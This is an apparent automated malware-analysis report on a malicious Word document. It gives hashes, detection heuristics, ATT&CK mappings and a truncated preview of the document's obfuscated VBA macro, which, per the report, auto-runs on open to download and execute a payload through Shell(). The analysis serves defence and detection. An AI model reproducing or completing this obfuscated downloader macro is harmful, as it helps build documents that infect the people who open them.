Office (OLE) malware analysis — malicious · d6358a7e9ceb668b

MALICIOUS

Office (OLE)

68.5 KB Created: 2017-10-13 07:42:00 Authoring application: Microsoft Office Word First seen: 2017-10-28

MD5: b88adcb78f36aea8fdea3fbdffeca800 SHA-1: acb17276be8482478851a90600f8e92ab85f23eb SHA-256: d6358a7e9ceb668bb5693c27cd70f25fea9852b682993773a4ddf88bbddf7749

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, a common technique for executing arbitrary commands. This strongly suggests the macro's purpose is to download and execute a secondary payload. The presence of an AutoOpen macro further indicates an attempt at automatic execution upon opening the document.

Heuristics 7

ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5248 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5248 bytes
SHA-256: `73a40007541ff15a5ae72e55f1a7004ab187fe41ada5e9345dde554e8ef02c81`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub wLbFCCPIi() wnwuLluFX = "" + iRiXtDH + nKEwAui + SNqEj + GEEDNZ + "coMments" + iRiXtDH + nKEwAui + SNqEj + GEEDNZ + wziKIkK + nrcvhIOr + HOTqIGXG + TLdTp + dXIjPwpa uiYqkHO = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 7045), 146) znmqJ = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 6326), 109) fjqIjV = Right(Left((dQBriiALt(wnwuLluFX)), 2666), 53) UHMARKZ = Right(Left((dQBriiALt(wnwuLluFX)), 9742), 43) ruVHjBij = Right(Left((dQBriiALt(wnwuLluFX)), 3407), 132) jTkAKUE = Mid((dQBriiALt(wnwuLluFX)), 2000, 63) nFfZdEW = Mid((dQBriiALt(wnwuLluFX)), 9147, 101) OjwaALzPKEw = Right(Left((dQBriiALt(wnwuLluFX)), 7481), 141) YtDUAk = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 6222), 98) fMGFz = Mid((dQBriiALt(wnwuLluFX)), 11103, 14) UsDKYi = Right(Left((dQBriiALt(wnwuLluFX)), 1899), 120) VFSZBv = Mid((dQBriiALt(wnwuLluFX)), 7621, 24) Fpbhm = Mid((dQBriiALt(wnwuLluFX)), 11909, 111) ElVuiT = Right(Left((dQBriiALt(wnwuLluFX)), 5743), 61) BpnuSAn = Right(Left((dQBriiALt(wnwuLluFX)), 5978), 100) CihPhLFF = Mid((dQBriiALt(wnwuLluFX)), 3862, 78) AQXoZw = Mid((dQBriiALt(wnwuLluFX)), 8567, 125) ZDomrfkRkNA = Right(Left((dQBriiALt(wnwuLluFX)), 6927), 129) RjziDotXaQo = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 8999), 6) pFiAOw = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 5006), 129) OCoPr = Right(Left((dQBriiALt(wnwuLluFX)), 4708), 112) PbrEiMijY = Right(Left((dQBriiALt(wnwuLluFX)), 9923), 110) JqbwmAa = Mid((dQBriiALt(wnwuLluFX)), 137, 101) imjzEIwCjK = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 10452), 96) nNHzZj = Mid((dQBriiALt(wnwuLluFX)), 10156, 65) HYGpsmraQQn = Mid((dQBriiALt(wnwuLluFX)), 2141, 134) MAdrsA = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 6990), 36) fzNwJW = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 1364), 59) wNRsohF = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 6097), 43) GSRYmQXYDaN = Mid((dQBriiALt(wnwuLluFX)), 4831, 75) jjMhcZ = Right(Left((dQBriiALt(wnwuLluFX)), 1278), 35) iPOFRCWzTiu = Right(Left((dQBriiALt(wnwuLluFX)), 11895), 115) mhEpsjpXGvP = Right(Left((dQBriiALt(wnwuLluFX)), 7910), 29) aWoRMYO = uiYqkHO + znmqJ + fjqIjV + UHMARKZ + ruVHjBij + jTkAKUE + nFfZdEW + OjwaALzPKEw + YtDUAk + fMGFz + UsDKYi + VFSZBv + Fpbhm + ElVuiT + BpnuSAn + CihPhLFF + AQXoZw + ZDomrfkRkNA + RjziDotXaQo + pFiAOw + OCoPr + PbrEiMijY + JqbwmAa + imjzEIwCjK + nNHzZj + HYGpsmraQQn + MAdrsA + fzNwJW + wNRsohF + GSRYmQXYDaN + jjMhcZ + iPOFRCWzTiu + mhEpsjpXGvP iBXXVov = Right(Left((dQBriiALt(wnwuLluFX)), 9128), 52) wIfmjXPVpki = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 9311), 117) DDurMJXYE = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 2827), 148) iWGUMVO = Right(Left((dQBriiALt(wnwuLluFX)), 8143), 100) VCHvj = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 304), 72) zDYYRUwwUdd = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 1069), 79) JRvIUV = aWoRMYO + iBXXVov + wIfmjXPVpki + DDurMJXYE + iWGUMVO + VCHvj + zDYYRUwwUdd BwwIEP = Right(Left((dQBriiALt(wnwuLluFX)), 11608), 147) fAwJaHA = Mid((dQBriiALt(wnwuLluFX)), 10429, 9) lnHuJYjawc = Mid((dQBriiALt(wnwuLluFX)), 4219, 80) DCMjiwYiVYW = Right(Left((dQBriiALt(wnwuLluFX)), 1632), 70) iJuZdjQjSsX = JRvIUV + BwwIEP + fAwJaHA + lnHuJYjawc + DCMjiwYiVYW mWacw = Right(Left((dQBriiALt(wnwuLluFX)), 10804), 96) rLcEWNRh = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 7665), 5) pPbPTHUaSwA = Right(Left((dQBriiALt(wnwuLluFX)), 8293), 134) AMnSk = Right(Left((dQBriiALt(wnwuLluFX)), 9603), 20) kjfWrwSVH = Mid((dQBriiALt(wnwuLluFX)), 9672, 1) ... (truncated)

SHA-256: 73a40007541ff15a5ae72e55f1a7004ab187fe41ada5e9345dde554e8ef02c81

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub wLbFCCPIi()
wnwuLluFX = "" + iRiXtDH + nKEwAui + SNqEj + GEEDNZ + "coMments" + iRiXtDH + nKEwAui + SNqEj + GEEDNZ + wziKIkK + nrcvhIOr + HOTqIGXG + TLdTp + dXIjPwpa
uiYqkHO = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 7045), 146)
znmqJ = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 6326), 109)
fjqIjV = Right(Left((dQBriiALt(wnwuLluFX)), 2666), 53)
UHMARKZ = Right(Left((dQBriiALt(wnwuLluFX)), 9742), 43)
ruVHjBij = Right(Left((dQBriiALt(wnwuLluFX)), 3407), 132)
jTkAKUE = Mid((dQBriiALt(wnwuLluFX)), 2000, 63)
nFfZdEW = Mid((dQBriiALt(wnwuLluFX)), 9147, 101)
OjwaALzPKEw = Right(Left((dQBriiALt(wnwuLluFX)), 7481), 141)
YtDUAk = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 6222), 98)
fMGFz = Mid((dQBriiALt(wnwuLluFX)), 11103, 14)
UsDKYi = Right(Left((dQBriiALt(wnwuLluFX)), 1899), 120)
VFSZBv = Mid((dQBriiALt(wnwuLluFX)), 7621, 24)
Fpbhm = Mid((dQBriiALt(wnwuLluFX)), 11909, 111)
ElVuiT = Right(Left((dQBriiALt(wnwuLluFX)), 5743), 61)
BpnuSAn = Right(Left((dQBriiALt(wnwuLluFX)), 5978), 100)
CihPhLFF = Mid((dQBriiALt(wnwuLluFX)), 3862, 78)
AQXoZw = Mid((dQBriiALt(wnwuLluFX)), 8567, 125)
ZDomrfkRkNA = Right(Left((dQBriiALt(wnwuLluFX)), 6927), 129)
RjziDotXaQo = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 8999), 6)
pFiAOw = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 5006), 129)
OCoPr = Right(Left((dQBriiALt(wnwuLluFX)), 4708), 112)
PbrEiMijY = Right(Left((dQBriiALt(wnwuLluFX)), 9923), 110)
JqbwmAa = Mid((dQBriiALt(wnwuLluFX)), 137, 101)
imjzEIwCjK = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 10452), 96)
nNHzZj = Mid((dQBriiALt(wnwuLluFX)), 10156, 65)
HYGpsmraQQn = Mid((dQBriiALt(wnwuLluFX)), 2141, 134)
MAdrsA = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 6990), 36)
fzNwJW = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 1364), 59)
wNRsohF = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 6097), 43)
GSRYmQXYDaN = Mid((dQBriiALt(wnwuLluFX)), 4831, 75)
jjMhcZ = Right(Left((dQBriiALt(wnwuLluFX)), 1278), 35)
iPOFRCWzTiu = Right(Left((dQBriiALt(wnwuLluFX)), 11895), 115)
mhEpsjpXGvP = Right(Left((dQBriiALt(wnwuLluFX)), 7910), 29)
aWoRMYO = uiYqkHO + znmqJ + fjqIjV + UHMARKZ + ruVHjBij + jTkAKUE + nFfZdEW + OjwaALzPKEw + YtDUAk + fMGFz + UsDKYi + VFSZBv + Fpbhm + ElVuiT + BpnuSAn + CihPhLFF + AQXoZw + ZDomrfkRkNA + RjziDotXaQo + pFiAOw + OCoPr + PbrEiMijY + JqbwmAa + imjzEIwCjK + nNHzZj + HYGpsmraQQn + MAdrsA + fzNwJW + wNRsohF + GSRYmQXYDaN + jjMhcZ + iPOFRCWzTiu + mhEpsjpXGvP
iBXXVov = Right(Left((dQBriiALt(wnwuLluFX)), 9128), 52)
wIfmjXPVpki = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 9311), 117)
DDurMJXYE = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 2827), 148)
iWGUMVO = Right(Left((dQBriiALt(wnwuLluFX)), 8143), 100)
VCHvj = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 304), 72)
zDYYRUwwUdd = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 1069), 79)
JRvIUV = aWoRMYO + iBXXVov + wIfmjXPVpki + DDurMJXYE + iWGUMVO + VCHvj + zDYYRUwwUdd
BwwIEP = Right(Left((dQBriiALt(wnwuLluFX)), 11608), 147)
fAwJaHA = Mid((dQBriiALt(wnwuLluFX)), 10429, 9)
lnHuJYjawc = Mid((dQBriiALt(wnwuLluFX)), 4219, 80)
DCMjiwYiVYW = Right(Left((dQBriiALt(wnwuLluFX)), 1632), 70)
iJuZdjQjSsX = JRvIUV + BwwIEP + fAwJaHA + lnHuJYjawc + DCMjiwYiVYW
mWacw = Right(Left((dQBriiALt(wnwuLluFX)), 10804), 96)
rLcEWNRh = Left(Right((dQBriiALt(wnwuLluFX)), Len((dQBriiALt(wnwuLluFX))) - 7665), 5)
pPbPTHUaSwA = Right(Left((dQBriiALt(wnwuLluFX)), 8293), 134)
AMnSk = Right(Left((dQBriiALt(wnwuLluFX)), 9603), 20)
kjfWrwSVH = Mid((dQBriiALt(wnwuLluFX)), 9672, 1)
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.